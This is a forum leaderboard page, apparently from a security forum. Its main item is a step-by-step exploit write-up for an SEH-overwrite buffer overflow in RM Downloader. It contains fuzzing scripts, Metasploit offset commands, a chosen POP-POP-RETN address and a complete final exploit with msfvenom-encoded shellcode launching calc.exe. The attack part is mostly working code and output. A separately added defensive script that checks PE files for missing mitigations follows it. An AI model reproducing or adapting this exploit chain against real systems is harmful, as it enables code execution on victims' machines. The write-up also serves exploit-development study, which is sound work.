Leaderboard

Popular Content

Showing content with the highest reputation on 04/23/20 in all areas

  1. kostik has top-notch services, just like at home, as recommended. I think the price/quality ratio is unbeatable on the market. In the end nobody is forcing you to host with kostik, but honestly, I recommend it; you might end up extremely satisfied.
    2 points
  2. TrueCaller - all the Romanian numbers you posted are already listed as SPAM.
    1 point
  3. Do you have your phone number posted publicly?
    1 point
  4. Packet Storm released new exploits on April 1st: 202003-exploits.tgz

     Download: 202003-exploits.tgz
     MD5 | 4a24dc33e2ed6b2bddc049bef69a01b5

     Source: https://packetstormsecurity.com/files/157052/Packet-Storm-New-Exploits-For-March-2020.html
    1 point
  5. Preamble

     The other day, I was gathering through Exploit-DB as usual, when I came across this exploit. Interested, I was eager to know if I could find a vulnerability. As a result of my success, I will explain the finding.

     The Bug

     RM Downloader suffers from a Buffer Overflow and a Structured Exception Handling Overwrite when inputting long strings within the ‘Load’ parameter.

     A small fuzzing script is generated:

         import struct

         buffer = "A" * 10000

         f = open ("poc.txt", "w")
         f.write(buffer)
         f.close()

     Once the script is executed, the file is created:

     In order to crash the application with the generated bytes, open the ‘Load’ tab, and paste the contents within the ‘Load’ parameter:

     Once this is done, click OK. Two additional message boxes may appear, just click OK. After this is done the application successfully crashes:

     Voila! The EIP has been successfully written. Moreover, the SEH chain has suffered from an overwrite as well:

     This application could easily be exploited with the use of a JMP/CALL ESP or PUSH ESP, RET. However, as I like SEH overwrites more, I will perform one in this case.

     A pattern is generated and saved into a file named “pattern”:

         root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern
         root@whitecr0wz:~/Exploit-Dev#

     The contents of the file “pattern” are copied and pasted within the ‘Load’ parameter, repeating the process:

     After the SEH Chain values have been overwritten, the nSEH value is copied:

     The offset is calculated with msf-pattern_offset:

         root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000
         [*] Exact match at offset 9008
         root@whitecr0wz:~/Exploit-Dev#

     The PoC is updated:

         import struct

         buffer = "A" * 9008 + "BBBB" + "CCCC"

         f = open ("poc.txt", "w")
         f.write(buffer)
         f.close()

     If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC):

     Good, in a scenario like this, a 3-byte SEH Overwrite could be performed, in case there are no available addresses without a NULL-byte.

     The modules are listed:

     As seen, the module RDfilter03 does not have any kind of protections/mitigations. Moreover, the base address does not contain a NULL-byte.

     Listing the POP-POP-RETN sequences:

     The first address (0x10031779) was chosen.

     The PoC is updated:

         import struct

         nseh = struct.pack("<I", 0x06710870)
         seh = struct.pack("<I", 0x10031779)

         buffer = "A" * 9008 + nseh + seh + "\xff" * 200

         f = open ("poc.txt", "w")
         f.write(buffer)
         f.close()

     After repeating the process, the SEH Chain values are overwritten as expected:

     After pressing SHIFT+F9 (Run), the additional bytes are executed:

     Shellcode is generated:

         root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
         [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
         [-] No arch selected, selecting arch: x86 from the payload
         Found 1 compatible encoders
         Attempting to encode payload with 1 iterations of x86/alpha_mixed
         x86/alpha_mixed succeeded with size 448 (iteration=0)
         x86/alpha_mixed chosen with final size 448
         Payload size: 448 bytes
         Final size of py file: 2188 bytes

     EndGame

     Final Code:

         import struct

         # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
         # Payload size: 448 bytes

         buf = b""
         buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
         buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
         buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
         buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
         buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
         buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
         buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
         buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
         buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
         buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
         buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
         buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
         buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
         buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
         buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
         buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
         buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
         buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
         buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
         buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
         buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
         buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
         buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
         buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
         buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
         buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
         buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
         buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
         buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
         buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
         buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
         buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
         buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
         buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
         buf += b"\x53\x55\x35\x50\x41\x41"

         nseh = struct.pack("<I", 0x06710870)
         seh = struct.pack("<I", 0x10031779)

         buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200

         f = open ("poc.txt", "w")
         f.write(buffer)
         f.close()

     Source: hwhitecr0wz.github.io
    1 point
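
The write-up above relies on a bundled module (RDfilter03) that ships without any mitigations; a vendor or defender can audit for that condition before release. The following is an added example, not part of the original post: it reads a 32-bit PE header and lists which of ASLR, DEP, CFG and SafeSEH an image does not opt into. The names `missing_mitigations` and `build_sample` and the sample header bytes are constructed for illustration.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_FLAGS = {"ASLR": 0x0040, "DEP": 0x0100, "CFG": 0x4000}
NO_SEH = 0x0400  # image declares that it uses no SEH handlers

def u16(d, o): return struct.unpack_from("<H", d, o)[0]
def u32(d, o): return struct.unpack_from("<I", d, o)[0]

def rva_to_offset(data, sections, count, rva):
    """Map an RVA to a file offset using the section table."""
    for s in range(sections, sections + 40 * count, 40):
        vaddr, rsize, raw = struct.unpack_from("<III", data, s + 12)
        if vaddr <= rva < vaddr + rsize:
            return raw + rva - vaddr
    return None

def missing_mitigations(data):
    """List the mitigations a 32-bit PE image does not opt into."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image")
    pe = u32(data, 0x3C)
    opt = pe + 24
    if data[pe:pe + 4] != b"PE\0\0" or u16(data, opt) != 0x10B:
        raise ValueError("not a PE32 (32-bit) image")
    chars = u16(data, opt + 70)  # DllCharacteristics
    missing = [name for name, bit in DLL_FLAGS.items() if not chars & bit]
    if not chars & NO_SEH:
        # SafeSEH: the load config directory (data directory 10) must carry
        # a non-zero SEHandlerTable (offset 64 of the 32-bit structure).
        cfg_rva = u32(data, opt + 176) if u32(data, opt + 92) > 10 else 0
        sections = opt + u16(data, pe + 20)
        off = rva_to_offset(data, sections, u16(data, pe + 6), cfg_rva)
        if off is None or u32(data, off) < 72 or u32(data, off + 64) == 0:
            missing.append("SafeSEH")
    return missing

def build_sample(chars, safeseh):
    """Constructed minimal PE32 header with one section (not a real DLL)."""
    img = bytearray(0x400)
    img[0:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)           # e_lfanew
    struct.pack_into("<HH", img, 0x44, 0x14C, 1)      # Machine, NumberOfSections
    struct.pack_into("<H", img, 0x54, 224)            # SizeOfOptionalHeader
    struct.pack_into("<H", img, 0x58, 0x10B)          # PE32 magic
    struct.pack_into("<H", img, 0x58 + 70, chars)     # DllCharacteristics
    struct.pack_into("<I", img, 0x58 + 92, 16)        # NumberOfRvaAndSizes
    struct.pack_into("<III", img, 0x138 + 12, 0x1000, 0x200, 0x200)  # section VA, raw size, raw ptr
    if safeseh:
        struct.pack_into("<II", img, 0x58 + 176, 0x1000, 72)  # load config directory
        struct.pack_into("<I", img, 0x200, 72)                # its Size field
        struct.pack_into("<II", img, 0x240, 0x10001100, 1)    # SEHandlerTable, count
    return bytes(img)
```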